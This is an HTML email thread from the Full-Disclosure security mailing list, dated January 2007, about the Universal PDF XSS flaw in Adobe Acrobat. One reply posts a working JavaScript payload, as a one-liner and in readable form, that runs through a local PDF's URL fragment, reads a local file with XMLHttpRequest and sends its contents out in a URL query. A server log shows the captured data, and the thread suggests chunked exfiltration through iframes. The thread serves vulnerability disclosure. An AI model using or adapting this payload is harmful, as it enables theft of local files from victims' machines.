Shows up in a log like this:<br><a href="http://127.0.0.1">127.0.0.1</a> - - [04/Jan/2007:10:57:03 -0500] "GET /whatever.htm?content=%3Chtml%3E%3Chead%3E%3Cmeta%20http-equiv=%22content-type%22%20content=%22text/html;charset=ISO-8859-1%22%3E%3Cmeta%20name=%22generator%22%20content=%22Adobe%20GoLive%205%22%3E%3Ctitle%3EAdobe%20Acrobat%20Standard%20and%20Professional%20Read%20Me%3C/title%3E%3C/head%3E%3Cbody%20bgcolor=%22 HTTP/1.1" 404 403 "" "Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:<a href="http://1.8.1.1">1.8.1.1</a>) Gecko/20061204 Firefox/2.0.0.1"<br><br>You could obviously a few iframes open on a site that would transfer each chunk of the file, 64 bit encoded or what have you.
<br><br><div><span class="gmail_quote">On 1/4/07, <b class="gmail_sendername">T Biehn</b> <<a href="mailto:tbiehn@gmail.com">tbiehn@gmail.com</a>> wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<a>file:///C:/Program</a> Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('
Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(xhr.responseText);window.location = "<a href="http://localhost:80/whatever.htm?content=" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://localhost:80/whatever.htm?content=</a>" + xhr.responseText;}};xhr.open('GET', '<a>file:///C:/Program</a> Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); <- sends a local file to a remote location.
<br><br>Readable:<br>function cXHR(){ //Grabs a legit XHR.<br> try{<br> return new ActiveXObject('Msxml2.XMLHTTP');<br> }catch(e){}<br> try{<br> return new ActiveXObject('Microsoft.XMLHTTP
');<br> }catch(e){}<br> try{<br> return new XMLHttpRequest();<br> }catch(e){} <br> return null;<br>}<br>var xhr = cXHR(); //For grabbing<br>xhr.onreadystatechange = function(){<br> if (xhr.readyState
== 4){<br> alert(xhr.responseText);<br> window.location = "<a href="http://localhost:80/whatever.htm?content=" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://localhost:80/whatever.htm?content=
</a>" + xhr.responseText;<br> }<br>};<br>
xhr.open('GET', '<a>file:///C:/Program</a> Files/Adobe/Acrobat 6.0/ReadMe.htm', true);<br>xhr.send(null);<br><br>Works in FFOX / Opera, not in IE.<div><span class="e" id="q_10fedda01f65f783_1"><br><br><div>
<span class="gmail_quote">
On 1/4/07, <b class="gmail_sendername">pdp (architect)</b> <<a href="mailto:pdp.gnucitizen@googlemail.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">pdp.gnucitizen@googlemail.com</a>> wrote:
</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Everybody knows about it. Everybody talks about it. We had a nice<br>party. It is time for estimating the damages. In this article I will<br>try to show the impact of the Universal PDF XSS vulnerability by<br>explaining how it can be used in real life situations.
<br><br><a href="http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/</a><br>
<br>--<br>pdp (architect) | petko d. petkov<br><a href="http://www.gnucitizen.org" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.gnucitizen.org</a><br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://secunia.com/</a><br></blockquote></div><br>
</span></div></blockquote></div><br>